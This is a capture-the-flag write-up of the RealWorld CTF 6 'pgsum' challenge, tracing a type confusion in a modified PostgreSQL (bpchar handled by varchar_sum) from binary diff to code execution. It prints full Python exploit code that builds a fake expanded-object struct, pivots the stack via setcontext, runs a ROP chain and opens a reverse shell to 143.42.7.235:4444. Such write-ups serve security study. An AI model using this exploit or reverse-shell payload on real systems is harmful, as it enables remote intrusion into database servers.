Recently, I played RealWorld CTF 6 with justCatTheFish and teamed up with a teammate, embedded, to solve pgsum, a challenge centered on exploiting PostgreSQL. It was a good lesson in approaching a real-world target and in the intricacies of exploiting PostgreSQL.
Description
We have added sum support for string to postgresql! Try it out!
SELECT sum(points) FROM rwctf;
Login the database with user ctf, password 123qwe!@#QWE.
After checking the challenge files, we see that the author wants us to pwn postgres 12.17 extended with custom functionality. Connecting to the remote lets us run arbitrary SQL queries, but we cannot create or modify anything.
Unfortunately, the code changes weren’t provided, so we need to figure them out ourselves. That’s easy: just compile postgres using the Dockerfile that the author provided and do a binary diff:
There were only two functions added - char_sum and varchar_sum.
These functions are similar but… different. They simply sum values after attempting to convert them to doubles. The varchar one uses the pg_detoast_datum and text_to_cstring functions. A bit of googling tells us that these functions are related to toasted data. More information can be found in the postgres docs. So…
Where is the bug?
It turns out that varchar_sum is used to sum values of types other than just varchar. The char_sum function is not that interesting. We can look up postgres functions using the pg_proc table:
We observe that sum functions related to types such as bpchar, text, and bytea also utilize the varchar_sum implementation. A quick look in the documentation reveals that bpchar is not a toastable type, so using varchar_sum for it is likely a bad idea…
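The lookup can be sketched in Python as follows. This is a minimal sketch, not the query we actually ran: the helper name list_sum_functions is hypothetical, and it assumes any DB-API cursor (for example one from psycopg2) connected as the ctf user. It relies only on the pg_proc columns oid and prosrc; for built-in C functions, prosrc holds the name of the C symbol.

```python
# Hypothetical helper: list SQL-level functions implemented by the two new C symbols.
QUERY = """
SELECT oid::regprocedure AS signature, prosrc
FROM pg_proc
WHERE prosrc IN ('char_sum', 'varchar_sum')
ORDER BY prosrc, proname
"""


def list_sum_functions(cur):
    """Return (signature, prosrc) pairs using any DB-API cursor."""
    cur.execute(QUERY)
    return [(str(signature), prosrc) for signature, prosrc in cur.fetchall()]
```

Every row whose prosrc is varchar_sum but whose signature takes a non-varchar type is a candidate for the type confusion.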
Setting a breakpoint at the beginning of varchar_sum confirms the hypothesis (it is important to attach to the PID returned by the query SELECT pg_backend_pid();). Let’s examine what is being passed to pg_detoast_datum after executing the following query: select bpchar_sum('1', 'AABBCCDD');
Cool! We have control over the first argument of the pg_detoast_datum function. Here is its source:
struct varlena
{
    char vl_len_[4];                    /* Do not touch this field directly! */
    char vl_dat[FLEXIBLE_ARRAY_MEMBER]; /* Data content is here */
};

struct varlena *
pg_detoast_datum(struct varlena *datum)
{
    if (VARATT_IS_EXTENDED(datum))
        return heap_tuple_untoast_attr(datum);
    else
        return datum;
}
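VARATT_IS_EXTENDED looks only at the first byte of the datum. The sketch below mirrors the little-endian header checks from postgres.h in Python, to show which first bytes send us into heap_tuple_untoast_attr. The function names are hypothetical, and it assumes the pointer refers to the raw characters of our string.

```python
def classify_varlena_header(first_byte: int) -> str:
    """Classify a varlena by its first byte (little-endian layout)."""
    if first_byte == 0x01:
        return "external"      # VARATT_IS_1B_E: TOAST pointer, a tag byte follows
    if first_byte & 0x01:
        return "short"         # VARATT_IS_1B: 1-byte header
    if (first_byte & 0x03) == 0x02:
        return "compressed"    # VARATT_IS_4B_C: 4-byte header, compressed data
    return "plain"             # VARATT_IS_4B_U: 4-byte header, uncompressed data


def is_extended(first_byte: int) -> bool:
    """Mirror of VARATT_IS_EXTENDED: anything but a plain 4-byte header."""
    return classify_varlena_header(first_byte) != "plain"
```

With 'AABBCCDD' the first byte is 0x41, which classifies as a short header, so the datum counts as extended and is handed to heap_tuple_untoast_attr.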
varlena is a struct used for representing toastable types. bpchar is not one, so this is clearly a problem. Now is the time for…
Exploitation
At this point there is no doubt that we can do something with a fake varlena struct, but we don’t know any memory addresses that postgres is using. This turned out to be simpler than we thought. It is enough to crash postgres to get a nice stack trace:
The good news is that the connection wasn’t closed, so when we execute the next query the addresses will stay the same. ASLR leak? Done. Now comes the harder part: a memory write.
Diving into a new, extensive codebase is no easy task, and the many complicated C macros in our way made it worse. We focused on functions related to varlena, starting with pg_detoast_datum and the functions it calls. Among them, heap_tuple_untoast_attr emerged as the first candidate: it appears to parse our data and return freshly allocated memory filled with the parsed data. We analyzed almost every branch that allocates memory and found nothing fancy. However, one branch caught our attention: it calls another parsing function on our data, heap_tuple_fetch_attr, which has a very interesting branch inside:
else if (VARATT_IS_EXTERNAL_EXPANDED(attr))
{
    /*
     * This is an expanded-object pointer --- get flat format
     */
    ExpandedObjectHeader *eoh;
    Size        resultsize;

    eoh = DatumGetEOHP(PointerGetDatum(attr));
    resultsize = EOH_get_flat_size(eoh);
    result = (struct varlena *) palloc(resultsize);
    EOH_flatten_into(eoh, (void *) result, resultsize);
}
Considering the code above, we fully control the ptr variable in the DatumGetEOHP function, so we effectively control the get_flat_size function pointer that is called right after DatumGetEOHP, which leads to an arbitrary function call.
In order to call EOH_get_flat_size we have to construct our payload in the following way:
the first byte of our payload needs to be set to 0x01 - this marks the datum as an external TOAST pointer, so it passes VARATT_IS_EXTENDED in pg_detoast_datum and the first half of the VARATT_IS_EXTERNAL_EXPANDED check in heap_tuple_untoast_attr
the second byte has to be 0x02, an expanded-object tag, to complete the VARATT_IS_EXTERNAL_EXPANDED check and reach DatumGetEOHP
the next six bytes should represent the address that will be copied to the ptr variable. The catch is that we cannot use null bytes in our payload, so we have to rely on the two bytes after our payload already being zero, so that the upper two bytes of the pointer come out as zero (which may not always be the case)
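The three rules above can be sketched as a small builder. This is a minimal sketch: the names build_fake_datum, VARATT_EXTERNAL_HEADER and VARTAG_EXPANDED are hypothetical, and it assumes a little-endian x86-64 target where user-space addresses fit in 48 bits.

```python
import struct

VARATT_EXTERNAL_HEADER = 0x01  # first byte: external TOAST pointer header
VARTAG_EXPANDED = 0x02         # second byte: expanded-object tag


def build_fake_datum(target: int) -> bytes:
    """Build the 8-byte fake datum: header, tag, then the low 6 bytes of target."""
    raw = struct.pack("<Q", target)
    if raw[6:] != b"\x00\x00":
        raise ValueError("address does not fit in 48 bits")
    body = bytes([VARATT_EXTERNAL_HEADER, VARTAG_EXPANDED]) + raw[:6]
    if b"\x00" in body:
        # A null byte would truncate the SQL string literal carrying the payload.
        raise ValueError("payload would contain a null byte")
    return body
```

The builder rejects addresses that contain a null byte in their low six bytes, since those cannot be delivered this way. The two upper bytes of the pointer are not part of the payload at all and must already be zero in memory.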
A quick look at the EOH_get_flat_size assembly:
pwndbg> disassemble EOH_get_flat_size
Dump of assembler code for function EOH_get_flat_size:
0x0000556a61659620 <+0>: mov rax,QWORD PTR [rdi+0x8]
0x0000556a61659624 <+4>: jmp QWORD PTR [rax]
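These two instructions amount to a double dereference: load a pointer from rdi+8, then jump to whatever address is stored where that pointer points. The sketch below emulates this over a byte blob to show the kind of layout that redirects the jump. All addresses are hypothetical and chosen only for illustration.

```python
import struct


def load_qwords(base: int, blob: bytes) -> dict:
    """Map each 8-byte-aligned address in blob to its little-endian qword."""
    return {
        base + off: struct.unpack_from("<Q", blob, off)[0]
        for off in range(0, len(blob) - 7, 8)
    }


def resolve_jump(memory: dict, rdi: int) -> int:
    """Emulate EOH_get_flat_size and return the address the jmp lands on."""
    rax = memory[rdi + 8]   # mov rax, QWORD PTR [rdi+0x8]
    return memory[rax]      # jmp QWORD PTR [rax]


# Hypothetical addresses, for illustration only.
BASE = 0x7F0000001000
TARGET = 0x7F00DEADBEEF

# Layout: 8 bytes of data, a pointer to the next slot, then the jump target.
blob = struct.pack("<QQQ", 0x4141414141414141, BASE + 0x10, TARGET)
memory = load_qwords(BASE, blob)
```

Calling resolve_jump(memory, BASE) returns TARGET, so three qwords at a known address are enough to redirect execution.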
rdi is the part that we control. To achieve code execution, the qword at rdi+8 must point to a location that holds a valid function address. Unfortunately, we don’t know any heap address, so we cannot craft anything on the heap. Fortunately, we are able to create and send a huge query string. postgres uses malloc to allocate memory for our string, and if the string is big enough, malloc uses mmap to create the chunk, which then sits at a known offset from libc (whose address we know!). We can verify that using the following python code:
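A minimal sketch of such a check, assuming local access to the backend's /proc/<pid>/maps in a test setup built from the provided Dockerfile. The helper names are hypothetical and this is not the script we used. The idea is to find the libc base in the mappings and confirm that the distance to a given address stays constant across runs.

```python
import re

# Matches libc-2.31.so or libc.so.6, but not libcrypto.so or libcom_err.so.
LIBC_NAME = re.compile(r"libc(-[\d.]+)?\.so")


def parse_maps(text: str) -> list:
    """Parse /proc/<pid>/maps text into (start, end, path) tuples."""
    regions = []
    for line in text.splitlines():
        fields = line.split(None, 5)
        if len(fields) < 5:
            continue
        start, end = (int(part, 16) for part in fields[0].split("-"))
        path = fields[5].strip() if len(fields) > 5 else ""
        regions.append((start, end, path))
    return regions


def libc_base(regions: list) -> int:
    """Lowest mapped address that belongs to libc."""
    return min(
        start
        for start, _end, path in regions
        if LIBC_NAME.match(path.rsplit("/", 1)[-1])
    )


def offset_from_libc(addr: int, regions: list) -> int:
    """Signed distance of addr from the libc base."""
    return addr - libc_base(regions)
```

If offset_from_libc gives the same value for the big chunk on every fresh connection, the chunk address can be computed from the leaked libc base alone.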
We have our offset now, so we can easily calculate the address where our “fake” structure will be stored. Crafting it is the next step.
In the initial attempt, we tried to call system with /bin/sh. The following code was used (an extension of the python script used before):
def probe():
    conn.commit()
    cur = conn.cursor()

    fake_struct = flat(
        b'/bin/sh\x00',
        p64(rdi + 0x10),  # point to address below
        p64(libc_base + SYSTEM)
    )

    cur.execute(flat(
        b"SELECT '\\x",
        b'aaaaaaaa' * 0x80000,
        fake_struct.hex().encode(),
        b"'::bytea, bpchar_sum('1', '",
        payload.strip(b'\x00'),  # no null bytes allowed
        b"')"
    ))
Sometimes rdi has a wrong MSB. To avoid this problem, it is enough to run some random SQL queries before executing our payload. With that fixed, we can do a quick check in gdb:
Cool, but unfortunately that approach will not work: the shell is spawned inside the main postgres process, and we cannot interact with it. Also, eight bytes are not enough to store /readflag\x00 for system. The conclusion is that we need to pop a reverse shell, but we have only one function call. We looked for gadgets that would let us do a stack pivot and craft a simple ROP chain in our big chunk of memory. We had a hard time finding a good one, so we decided to go with the setcontext libc function.
As you can see, it has a lot of nice assembly instructions: we can set rsp to the value from [rdx+0xa0]. The good news is that rdx is taken from rdi, which points to memory that we control. A bit of shenanigans and we end up with the final payload:
SETCONTEXT = 0x40ef0
SYSTEM = 0x4c3a0
POP_RDI = 0x0000000000027765  # : pop rdi ; ret

def exploit():
    conn.commit()
    cur = conn.cursor()

    cur.execute(b"SELECT repeat('1s0', 1000)")  # fix rdi MSB

    fake_struct = flat(
        b'whatever',
        p64(rdi + 0x10),  # point to address below
        p64(libc_base + SETCONTEXT),
        b'/bin/bash -c "/bin/sh -i >& /dev/tcp/143.42.7.235/4444 0>&1"   \x00',  # padded to 8B
    )

    for v in range(1 + 8, 0x1d):
        if v == 0x13:  # rcx
            # special case - point it to ret
            # it is being pushed on stack later, so we dont want to break our ROP
            fake_struct += p64(libc_base + POP_RDI + 1)
            continue

        # create values that will be picked by [rdx+X] operations
        # 0x10000 is to move our new rsp a bit further so `system` function stack is able to grow
        fake_struct += p64(rdi + 0x70 + 0x88 + 0x10000)

    # add padding
    for _ in range(0x10000 // 8):
        fake_struct += p64(0xDD)

    # ROP
    fake_struct += flat(
        p64(libc_base + POP_RDI + 1),  # ret to align the stack
        p64(libc_base + POP_RDI),
        p64(rdi + 0x18),  # reverse shell cmd
        p64(libc_base + SYSTEM),
    )

    cur.execute(flat(
        b"SELECT '\\x",
        b'deadbeef',  # add 4B padding to align the rest of payload to 8B
        fake_struct.hex().encode(),
        b'aaaaaaaa' * 0x400000,
        b"'::bytea, bpchar_sum('1', '",
        payload.strip(b'\x00'),  # no null bytes allowed
        b"')"
    ))
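The index arithmetic in the loop is easy to get wrong, so it is worth checking on its own. The sketch below recomputes, for each loop index v, the offset from rdi at which the corresponding qword lands. It assumes the command string occupies exactly 0x40 bytes, as its "padded to 8B" comment implies; the constant and function names are hypothetical.

```python
CMD_OFFSET = 0x18     # b'whatever' (8) + pointer (8) + setcontext address (8)
CMD_LEN = 0x40        # assumption: command string padded to 64 bytes
LOOP_START = 1 + 8    # first value of v in range(1 + 8, 0x1d)
LOOP_END = 0x1D       # exclusive upper bound of the loop
PADDING = 0x10000     # filler between the context area and the ROP chain


def slot_offset(v: int) -> int:
    """Offset from rdi of the qword written for loop index v."""
    return CMD_OFFSET + CMD_LEN + (v - LOOP_START) * 8


def rop_offset() -> int:
    """Offset from rdi where the ROP chain starts."""
    return slot_offset(LOOP_END) + PADDING
```

Under that assumption, slot_offset(v) equals v * 8 + 0x10, so v == 0x12 lands at 0xa0 (the rsp slot) and v == 0x13 lands at 0xa8 (the value loaded into rcx and pushed). rop_offset() equals 0x70 + 0x88 + 0x10000, which is exactly the value the loop stores as the new rsp.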